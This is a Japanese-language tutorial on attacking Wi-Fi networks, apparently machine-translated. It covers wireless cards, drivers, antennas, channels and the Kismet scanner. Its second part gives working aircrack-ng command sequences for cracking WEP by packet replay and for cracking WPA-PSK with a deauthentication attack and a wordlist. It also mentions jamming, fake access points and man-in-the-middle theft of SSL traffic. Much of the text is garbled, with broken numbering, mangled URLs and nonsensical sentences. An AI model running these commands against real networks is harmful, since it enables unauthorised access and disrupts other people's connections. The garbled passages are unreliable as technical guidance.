I. 無線セキュリティ研究に必要なハードウェアとソフトウェアの選択、物理的・電気的パラメータ
実際にワイヤレスセキュリティ攻撃を行う際には、それに付随するソフトウェアを含め、いくつかのハードウェアデバイスを準備する必要があります。基本的に、ワイヤレス・ハッキングには以下のコンポーネントが含まれます。
1.基本チップセット
それはUSBカード、PCIカード、またはPCMCIA内蔵カードであるかどうか、それらのコアは、"チップセット "である、つまり、今、しばしばカード王と呼ばれる、異なるブランドのワイヤレスカードは、本質的にチップセットの内部使用を議論する必要があります、電気的性能に焦点を当てるために、チップセットのためにもあります。今、一般的なWLANチップメーカーは次のとおりです。
1) Atheros: https://.//os
3) Intel Pro Wireless、Intel Wifi Link (Centrino)。
4) Ralink: http://.../ja/
5) Realtek:http://.....tw/
2.チップドライバ
チップはハードウェアデバイスであり、Ring3アプリケーションは、ドライバを介してチップの指定されたポートと通信することにより、チップの物理的な特性を使用する必要があり、Linuxベースのワイヤレスドライバは、"開発 "の期間を経て、最終的にはしています
最終的な「メインツリー構造」としての「mac80211ドライバーフレームワーク」。
mac80211はワイヤレスドライバフレームワークで、多数のAPIを提供しています。
一般的に、各チップメーカーは、一致するドライバを提供し、アップデートをサポートします。
1) アテロス(ARシリーズ)
http://...//ds/
http://...////os
2) ブロードコム
http://.../////om
3) インテル
http://...////fi
4)ラリンク(RTカテゴリー)
http://...//ds/
タオバオで販売されている多くのケージャンの内蔵チップは、このRTモデルです。
5)リアルテック(RTLシリーズ)
注意点としては、ドライバを選択する際に、現在のドライバがUSBをサポートしているかどうかに注意する必要があります(私を含め、ほとんどの人が現在外付けNICを試しているため)#p#。
3.アプリケーション・プログラミング・インターフェース
本来であれば、ring3のコードを直接書いて、ドライバーのプログラミング・インターフェースを呼び出せば、目的の機能を実現できます。しかし、実装の難易度や開発コストの面では、やはり面倒です。このため、オープンソースコミュニティでは、よくパッケージ化され、よく機能する
APIライブラリは、カプセル化の層としてドライバの調整といえば、アプリケーションの上位層は、WLANソフトウェアのより便利で迅速な開発することができますように。
1) OSDEP
Aircrack-ng は OSDEP API に基づいています。
http://.//-ng
2) ロルコン2
3) libpcap
Libpcap は、アプリケーションの完全な移植性を念頭に、システムに依存しない、ユーザレベルのネットワークパケットキャプチャインタフェースを提供します。
http://.//ap/
4.ワイヤレスセキュリティソフトウェアツール
このレベルには、Linuxで一般的な各種ユーティリティがあります。
主な機能は以下の通りです。
1) スニッフィングの目的を達成するために、「モニターモード」で指定された「チャネル」の無線データグラムをキャプチャします。
2.1) トラフィックを増加させ、WEP攻撃を加速させるDDOS効果を引き起こします。
3) 「プローブパケット」の送信によるプロアクティブなサービス発見。
4) 信号干渉 #p#
一般的に使用されているワイヤレスセキュリティソフトウェアには以下のものがあります。
1) エアパック(スーツ)
http://。-.rg/
2) MDK3
http://-./.?=k3
3)空軍基地
https://..om/
4) AirPWN
http://..et/
5) キスメット
http://..et/
注意すべき点がひとつあります。
この論文で取り上げたドライバとソフトウェアは、すべてLinuxプラットフォームのものです。winpcapをベースにしたプログラミングとスニッフィング攻撃をwindowsでも試してみましたが、かなり多くの問題があり、研究作業をスムーズに進めることができないことがわかりました。Linuxのドライバを使用し、スキャナは後で宣言されません
私は先に言ったように、ネットワークカードの異なるモデルは、"主な違いは、"内蔵のチップセットにある、しかし、ワイヤレスネットワークカードは、チップセット、ドライバに加えて、良いか悪いかであり、上記のように言っただけでなく、独自の物理的および電気的特性のいくつかは、次のように1つずつ学ぶことに関連します。
一般的に、NICの総合的な性能評価には次のような側面があります。
1. チップセットモデル 2.
3.アンテナサポート
4.感度
5.周波数範囲
6.作業チャンネル
7.支援の方法
8.USBインターフェースをサポートするかどうか
9.価格#p#
0×1:チップセットモデル
個人的な経験では、主流のチップメーカーのチップの性能はあまり変わりません。私は実験用に「RT3070L」チップを選びましたが、BT5ではデフォルトでドライバサポートが提供されているので、準備も簡単です。一般的に、NICの価格が数千ドルに達すると、チップモデルの違いが性能差をもたらすことがあります。
チップを選択する際、注目すべき点は、そのチップのドライバ・サポートです。
airdriver-ng対応
airdriver-ng 詳細 シリアル番号
airdriver-ngのインストール
0×2:送信電力
送信電力は、ワイヤレスモードでパケットを送信する必要があるときに、プロトコルスタックは、レイヤごとにパケットをカプセル化し、最終的に "データフレーム "にカプセル化し、ワイヤレスカードによってRF信号に変換され、フィーダを介してアンテナに運ばれ、電磁波の形でアンテナから放射され、焦点を当てる必要がある次元です。媒体中の電磁波の伝搬過程は減衰し続けるため、Wi-Fi信号の場所から遠く離れた場所では受信できず、受信場所への電磁波はアンテナで受信され、フィーダーラインを通って目的の無線受信機器に到達するため、ワイヤレスネットワークエンジニアリングでは、送信機の電力とアンテナの放射容量の計算は非常に重要です。
Txはtransmissionの略。電波の送信電力とは、ある周波数帯域におけるエネルギー量のことで、通常2つの方法で測定されます:
1.パワー:ワット単位の線形レベル。例えば、私が実験に使ったワイヤレスカードの送信電力は0.063W、つまり63mWです。 2. ゲイン:63mWをゲインに換算すると18dBm。
電力単位mW(MW)とdBm(dBm)の変換
1. dBm = 10 x log [power mW] 2. mW = 10 [gain dBm / 10dBm] 3.
低電力 "システムでは、どのdBも重要であり、特に "3dBルール "を覚えておくことが大切です。
1) 3dB増加:パワーが2倍になります。
2)3dBの低減:電力半減
電力が 2 倍になるごとに、レベルは 3 dBm ずつ増加します。 AP やローカル NIC の信号強度を測定するために使用できるツールは数多くあります。
1.スペクトラムアナライザー:淘宝網に多数、一式数千元
2.インサイダー(下)
0×3:アンテナサポート
アンテナはワイヤレスNICのパフォーマンスにとって非常に重要ですが、それほど重要でないように思われがちです。 有線ブロードバンド間の接続媒体がケーブルや光ファイバーだとすると、ワイヤレスネットワークの伝送媒体は空気であり、アンテナはNICと空気媒体の間の「コネクタ」に相当します。
無線システムにおいて、アンテナは電流波を電磁波に変換するために使用され、変換の過程で送受信信号を「増幅」することもでき、このエネルギー増幅の尺度が「利得」になります。アンテナ利得の測定単位は「dBi」です。
無線システムにおける電磁波エネルギーは、送信装置の送信エネルギーとアンテナの増幅重畳効果によって発生するため、例えば送信装置の電力が100mW(20dBm)、アンテナの利得が10dBiであれば、総送信エネルギーというように、同じメトリック・利得で送信エネルギーを測定するのがよい。
送信電力+アンテナ利得=20dBm+10dBi=30dBm
それは単語 "アンテナ "は、そのような金属棒の種類の上に子供の頃ラジオで遊ぶように、先入観を持っているかもしれないことに注意する必要があり、実際には、物理学の観点から、"アンテナ "は、すべての収束を指す抽象的な概念である必要があり、利得は、デバイスに電磁信号を送信し、次のように理解することができます。
アンテナは、ネットワークカードがすでに生成している信号を集約することで機能します。カードは3次元の球体のような形の信号を生成します。無指向性アンテナの仕事は、基本的にこの球体を拾い、円をより「平らに」することです。さらに、無指向性アンテナのゲインが高ければ高いほど、円形パターンは「平坦」になります。指向性アンテナも同じように、一方向の信号を犠牲にして、もう一方向の信号を得ます。
アンテナは2つのタイプに大別されます。
1.無指向性アンテナ
全方向に拡張されたアンテナ
1) 基地局のアンテナ: 9~12dBi 利得
通常、長さ30インチまたは48インチの白色PVCパイプで入手可能。アンテナは長ければ長いほど利得が高くなります。
2) 磁気基礎アンテナ: 5~9dBi 利得
戦時中の運転に最適です。
2.指向性アンテナ
特定の方向に範囲を広げるアンテナ
1) 導波管アンテナ
2)誘導送信アンテナ:導波管アンテナの昇圧
3) プレートアンテナ
主に屋外の信号カバレッジに使用されます。GSMであれCDMAであれ、プレートアンテナは基地局アンテナの非常に重要なタイプの最も一般的な用途です。
4) 八木アンテナ
http://.../ki/%%%%%%%%BF
形はとてもクールで、タオバオでたくさん売っています。
5)パラボラアンテナ
最大利得、最狭ビームを提供します。パラボラアンテナは、パラボラアンテナと呼ばれ、パラボラアンテナの焦点に位置する給電部から構成されます。テレビで見るレーダー用の円盤はこのタイプのアンテナです。
0×4:感度
感度は通常dBm(デシベル)で測定され、マイナスの数値が小さいほど優れています。対数関数図を描けば、その原理がわかります。天文用語集に「アンテナ感度」の定義があります。
0×4:周波数範囲
ここでいう周波数とは、ワイヤレスカードの動作帯域のことで、IEEE802.11のワイヤレス信号は
1. 2.4GHz帯
2.4.9/5.8GHz帯
0×5:動作チャンネル
Wi-Fiは合計14チャンネル
1.IEEE 802.11b/g規格は2.4Gバンドで動作し、周波数範囲は2.400~2.4835GHz、総帯域幅は83.5Mです。
2.14のサブチャンネルに分割
3.各サブチャンネルは22MHz幅。
4. 隣接チャンネルの中心周波数間5MHz
5.隣接する複数のチャンネルの周波数オーバーラップ
6.非干渉チャンネルを確保するため、全周波数帯域で非干渉チャンネルは3つのみ。
他国におけるチャネリゼーション
1.日本:2.4GHz~2.4835GHz(13チャンネル)
2.北米/FCC:2.412~2.461GHz(11チャンネル)
3.欧州/ETSI:2.412~2.472GHz(13チャンネル)
4.日本/ARIB:2.412~2.484GHz(14チャンネル) #p#
0×5:対応モード
現在、主要なワイヤレスカードは以下のモードで動作します。
11b:1/2/5.5/11Mbps
11g: 6/9/12/18/24/36/48/54Mbps
11n:最大150Mbps
この記事の冒頭で、802.11ファミリーの現在の動作モードをリストアップします。
NICを選択する際には、動作モードを確認することが重要です。なぜなら、接続のためにAPとやりとりする際に、動作モードをネゴシエートするプロセスがあるからです。
クライアントとAPの両方が特定の動作モードをサポートしている場合にのみ、両者は接続を継続できます。
これは、SSLやTLSの初期認証で行われる暗号アルゴリズムのネゴシエーションによく似ています。
0×6:USBインターフェースをサポートするかどうか
ワイヤレスカードに周辺機器用のUSBポートはありますか?
0×7:価格
NIC パフォーマンス比較: http://...///es
FCC認証検索: http://...///id/
#p#
第二に、ワイヤレス攻撃の最初のステップ: "ネットワークAPの検出"、スキャナの使用
ワイヤレスネットワークカードの選択を理解した後、それはワイヤレスセキュリティ研究のための基本的な準備を実施する準備ができて、次のステップは、ワイヤレスセキュリティの研究を開始するだけでなく、最初の問題に直面するために、どのように攻撃のターゲットを見つけるために、すなわち、"ネットワークAPの検出"、この目標を完了するには、スキャナを使用する必要があります。
前述したように、基本的にワイヤレスセキュリティソフトウェアは以下の機能を果たす必要があります。
1) スニッフィングの目的を達成するために、「モニターモード」で指定された「チャネル」の無線データグラムをキャプチャします。
2.1) トラフィックを増加させ、WEP攻撃を加速させるDDOS効果を引き起こします。
3) 「プローブ・パケット」の送信によるプロアクティブなサービス発見。
4) 信号干渉
次に、これらの目標を達成するために使用するソフトウェアと、その仕組みについて学びます。
0×1:パケット盗聴
パケット・スニッフィング・ソフトウェアは、与えられた「チャネル」上のパケットについてワイヤレス信号を監視し、それ自身はパケットを送信しません。その代わり、モニターモードを使ってチャンネル上の全てのパケットを盗聴します。
ワイヤレスカードを「モニターモード」に設定することは、通常の有線イーサネットカードをプロミスキャスモードに設定することと似ています。この場合、"ケーブル "上を移動する全てのパケットを見ることができます。
しかし、両者の決定的な違いは
1) 有線NICをプロミスキャスモードに設定する場合、キャプチャするパケットは現在のチャネルに存在する必要があります。
2) ワイヤレスネットワークの場合、2.4GHz帯のバンド周波数は免許不要のため、シェアードアクセスとなり、同じチャネルを使用する複数のネットワークが重複して存在する可能性があります。モニターモードで見られるパケットは、複数のチャンネルに存在する可能性があります。
3) 有線NICの場合、イーサネットカードのプロミスキャスモードは標準機能です。
4)ただし、無線カードのモニタリングモードについては、単純にモニタリングモード機能があればよいというものではありません。
4.1) NICのチップ自体がこのモードをサポートしていること。
4.2) 使用するドライバは、モニタモード自体もサポートしている必要があります。
パケットスニッフィング・スキャンツールの原理
1) ワイヤレスカードをモニターモードにします。
2) スキャナはループ状態に入り、常にカードからパケットを読み取り、分析し、インターフェイス#p#を更新します。
無線スニッフィングにKismetを使用
Kismetは単なるスキャンツールではなく、802.11プロトコルのパケットキャプチャ、解析のためのフレームワークです。3つの部分から構成されています。
1. kismet_server
2. kismet_client
3. kismet(ELF): kismet が通常設定する実行ファイル。
BT5でKismetを入力すると、Kismetは自動的に適切なソースNICを検出します。
メニューバーの「S」をクリックしてAPをソートし、特定のSSIDをクリックして詳細を表示します。
1. WEP
の例です。
ifconfig wlan1 up
airmon-ng start wlan1
airodump-ng mon0
airodump-ng --ivs -w longas -c 6 mon0
aireplay-ng -3 -b 08:10:77:CF:C9:62 -h CC:AF:78:26:77:BD mon0
// パケットキャプチャが終了したら、クラッキングを開始するのに十分なIVパケットをキャプチャしたことを確認します。
エアクラックNG LONGAS-01.IVS
IVsパケットのキャプチャ数が十分でない場合、クラック障害が発生します。
2. WPA
の例です。
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng mon0
//無線パケットのキャプチャ開始
airodump-ng --ivs -w longas -c 6 mon0
// ハンドシェーク・パケットをキャプチャするために、Deauth攻撃用の別のコンソールを開きます。
aireplay-ng -0 1 -a 08:10:77:CF:C9:62 -c CC:AF:78:26:77:BD mon0
//右上にWPAハンドシェイクのプロンプトが表示されたら、ハンドシェイクパケットがキャプチャされ、WPA-PSKのクラックが開始されたことを意味します。
aircrack-ng -w /pentest/passwords/wordlists/test.lst longas-01.ivs
#p#
0×3:サービス発見、プローブパケットのプロアクティブな送信
無線スニッフィング攻撃にある程度対抗するために、多くの無線ネットワークAPは多くの設定を採用しています。
1.ヒドゥン・モード(非ブロードキャスト・モード)が有効。これらのネットワークは、"ビーコンフレーム "パケットにSSID値を含まず、ブロードキャストタイプのプローブ要求に応答しません。
2.指定された実行範囲内のMACアドレスに対するブロードキャスト・プローブ要求のみを受信するMACアドレス・フィルタリング。
その結果、「ブロードバンド接続リスト」に対応するSSID(WiFi名)が表示されなくなります。
この防衛策に対応するため、スキャナーは隠されたSSIDを取得する技術も採用しています。
1.802.11のフレーム構造を研究することで、802.11の管理フレームは認証を必要としないことが分かっています。
これはWPAのクラッキングにも不可欠で、本質的にはIEEEが取り組んでいると思われるプロトコルの脆弱性なのですが、まだプロトコルフォーマットの新しいバージョンがリリースされているのを見たことがありません。
2.ビーコン管理フレームのSSIDの他に、通常のデータフレームや送信データを制御するためのコントロールフレームにもSSID(平文)が含まれますので、このようなデータフレームをキャプチャしてSSIDを取得し、UIの表示リストに追加することができます。
3.追記
ワイヤレスセキュリティの研究は、かなり多くの方向性を持っている、Google上のより多くの記事は、パスワードのクラッキングの方向性である、ツールの使用、素晴らしい話、加えて、私は個人的に、それはまた、伝統的なイントラネットのセキュリティの問題と組み合わせることができると感じているような。
1.偽AP、トラフィックのハイジャック:ARPポイズニングと同様の効果が得られます。
2.MITの中間者攻撃
3.中間者攻撃に基づくSSL平文の盗用
関連する学習教材
http://..om/
http://..om/
http://...//rs
http://...//&;.df
http://.../キ/%%%%%BF
http://.../////_.ml
http://...//%%%%%%%%%%%%A8
http://...///.ml



